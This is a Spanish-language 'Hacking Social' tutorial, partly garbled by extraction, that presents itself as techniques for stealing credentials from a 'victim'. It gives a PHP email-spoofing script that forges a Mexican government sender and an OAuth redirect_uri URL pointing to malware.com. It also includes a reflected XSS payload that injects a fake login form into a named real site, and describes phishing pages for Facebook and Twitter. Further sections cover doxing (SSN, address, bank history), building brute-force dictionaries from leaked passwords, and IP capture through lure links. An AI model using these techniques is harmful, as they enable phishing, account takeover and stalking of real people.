Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Twitter
Facebook
Hacking Social
- Una buena cantidad de técnicas que pueden ayudarte a robar credenciales -
- Autor: Kelvin Parra -
- información darknet
¿Qué Información?
- Correo Electrónico
- Celular Y Teléfono Personal y Local
- Dirección De Vivienda Exacta
- GeoLocalización
- SSN
- Historial Bancario
- Chats Y Amigos
- Contraseñas Débiles
- Redes Sociales Perfiles
- Historial De Trabajo
en otros casos también podemos incluir información de los servicios básicos de
nuestra víctima.
Herramientas:
Podemos obtener información pública de portales una de ella son los currículos
podríamos utilizar esta búsqueda de currículos por medio de dorks de igual manera
podríamos consultar a Linkedin.
También podemos incluir un nombre y por arte de magia quizás sea el de nuestra
víctima.
site:plus.google.com (nombre)
site:linkedin.com (nombre)
site:twitter.com (nombre)
site:paypal.com/cgi-bin (nombre)
-
- búsqueda por nombre de usuario
- Perfil Linkedin
- Perfil Twitter
- Historial Paypal
Cantidad:
Postfix smtpd 37
Microsoft Exchange smtpd 26
Barracuda Networks Spam Firewall smtpd 5
MailEnable smptd 4
Estos productos de correo electrónico pueden ser mucho más vulnerables excepto
Microsoft Exchange stmpd el cual ha recibido mucho soporte después de pasar por
intentos de ataques.
<?php
$to = "MiVictima@gmail.com";
$subject = "Cabeza Titulo";
$txt = "Contenido de mensaje";
$headers = "From: support@presidencia.gob.mx";
mail($to,$subject,$txt,$headers);
?>
$to = destinatario
$subject= titulo cabeza de mensaje
$txt= mensaje
$headers=”From: Correo A Suplantar
DKIM: El sistema DKIM (DomainKeys Identified Mail) es una evolución del sistema
DomainKeys desarrollado inicialmente por Yahoo como un mecanismo para que un
mail pueda ser validado por un destinatario comprobando de forma inequívoca que
el origen del mismo es realmente el que aparece en las cabeceras del email.
DMARC: Después de establecer los sistemas SPF y DKIM, puedes configurar DMARC
añadiendo políticas a los registros DNS de tu dominio en forma de registros TXT
igual que con SPF y con ADSP.
Ataque Al Servidor STMP
- Escenario De Ataque
Como tal SMTP VRFY Scanner no es un ataque directo pero si el servidor SMTP
tiene activadas algunas opciones que podían conducir potencialmente a la
información de fuga de direcciones de correo electrónico esto si puede conducir a
un ataque directo.
Problema En General:
Tomar En Cuenta:
<?php
$to = "MiVictima@gmail.com";
$subject = "Cabeza Titulo";
$txt = "Contenido de mensaje";
$headers = "From: support@presidencia.gob.mx";
mail($to,$subject,$txt,$headers);
?>
El email spoofing es una técnica muy buena en caso que quieras aplicar ingeniería
social o engañar a tu víctima con un falso señuelo.
GITHUB
-t Realizar un descubrimiento de
expansión de TLD DNS
mail.presidencia.gob.mx
correo.presidenca.gob.mx
stmp.presidencia.gob.mx
todo ello para que entre personal de gobierno o trabajadores del estado por
ejemplo para saber su dirección es necesario echarle un ojo al MX y para ello
utilizamos “Dnsdumpster” y la extensión o un scanner de puertos como Nmap o
auto detección como shodan utilizando su extensión para navegadores lo puedes
descargar Aqui!.
DnsDumpster
para que nosotros observemos la estructura del webmailer debemos saltar esa
barrera es utilizado por muchos y otros utilizan el típico métodos de realizar un
ataque de fuerza bruta para lograr autentificar en esa barrera.
- vulnerabilidad básicas:
mediante una sesión iniciado hackers han llegado a burlar la seguridad desviando
la dirección en este ejemplo redirect_uri=(pagina) en este caso se trata del acceso
a una plataforma de correo.
Ejemplo:
https://www.ejemplo.com/oauth/authorize?response_type=code&client_id=(ID)
&redirect_uri=malware.com/code.php&scope=user
REFERENCIA 1
REFERENCIA 2
<script>document.body.innerHTML=
Modificación:
Función Completa:
https://sw.shop.ca/supplierworld/forgot_password.php?forms_action=forgot_pa
ssword1&forms_show_error=<script>document.body.innerHTML=”<center><h1>K
elvinSecurity</h1><form%20name=login%20action=index.php%20method=post>Us
ername:<input%20type=text%20name=username><br>Password:<input%20type=p
assword%20name=password><br><input%20type=submit%20value=Login%20name=
submit></form></center>”;</script>
Phishing para facebook o Twitter:
Podemos crear y enviar una imagen que funcione como clickjacking al momento
de clickear la función que debe tomar es el redireccionamiento a la página falsa de
nuestro servidor si no emite “HTML” puede ser alguno como este:
Hola, Betsy:
Gracias.
El equipo de Facebook
xxxxx
- Infraestructura Facebook
- HTML CODE
- PHP SCRIPT
HTML CODE MODIFICACIÓN:
USUARIO:
CONTRASEÑA:
<?php
}
3 - Búsqueda De Correos Comprometidos
abemos de los leaks que se han presentado últimamente hoy en día han creado
S
buscadores que hacen posible buscar tu dirección de correo dentro de esa base de
datos para visualizar si tu correo está comprometido con uno de estos masivos
leaks de igual manera las búsquedas en portales donde últimamente se realizan
estos leaks.
Resultado En Pastebin
- Restos de las fugas
- Otras Fuentes:
- Fuente
- Infraestructura (DB)
3 - Listado De Contraseñas Comprometidas
VK Password List
Ventaja: Un usuario podría buscar estas dbs y utilizar la contraseña por defecto
contra su víctima.
Ventaja:
Mediante estos últimos leaks se puede realizar un diccionario de contraseñas que
fueron utilizadas para realizar un ataque de fuerza bruta en otras paginas sociales
el problema es que tanto como Twitter y Facebook bloquean los intentos de acceso
“Bloqueando Temporalmente Tu Dirección IP” pero no quedaría tomar estas
contraseñas que fueron las más utilizadas y crear nuestro propio diccionario.txt
- mobile.twitter.com
Script
3 - Capturar Dirección IP Mediante Señuelo
Capturar IP Vinculo
¿Qué Es GeoLocalizacion?
Detalles De Funciones:
- Geolocalización
No se me quedara atrás y existe 2 formas de obtener estos datos puede ser por
medio de esta estructura o por medio de una terminal.
Infraestructura
Open Source
Geolocalización IP:
No es muy complicado y menos llevará mucho que hacer pues solo se trata de
consultar la dirección para obtener detalles sobre esta IP.
ASN
City
Country
Country Code
ISP
Latitude
Longtitude
Organization
Region Code
Region Name
Timezone
Zip Code
Detalles que proporciona ip2geolocation desde la terminal suelen ser los mismos
que en ip2geolocation.com pues la funcion basica es consultar al servidor.
http://ip2geolocation.com/?ip=
3 - Information Disclosure Y Metadatos:
Metadatos: dentro del entorno de búsqueda de datos que proporcionan los ficheros
sea documentos e imágenes en otros casos “Audios” este método se aplica en la
informática forense en doxing o cualquiera otra investigación independiente se
realizan estos trabajos.
La foto que ven como ejemplo fue una fotografía que causó gran importancia
durante tiempos de guerra los terroristas toman fotografías y las publican en redes
sociales pues esta es un ejemplo de como se ha podido localizar mediante
geolocalización e identificar un tipo de cámara utilizada.
Herramientas:
geosetter metadata extractor
logipole metadata extractor
ulfwood Metadata Extractor
Foca Metadata Extractor
Descargar FOCA
-
Descripcion: Los documentos que es capaz de analizar son muy variados, siendo
los más comunes los archivos de Microsoft Office, Open Office, o ficheros PDF,
aunque también analiza ficheros de Adobe InDesign, o svg por ejemplo.
Estos documentos se buscan utilizando tres posibles buscadores que son Google,
Bing y Exalead. La suma de los tres buscadores hace que se consigan un gran
número de documentos. También existe la posibilidad de añadir ficheros locales
para extraer la información EXIF de archivos gráficos, y antes incluso de descargar
el fichero se ha realizado un análisis completo de la información descubierta a
través de la URL.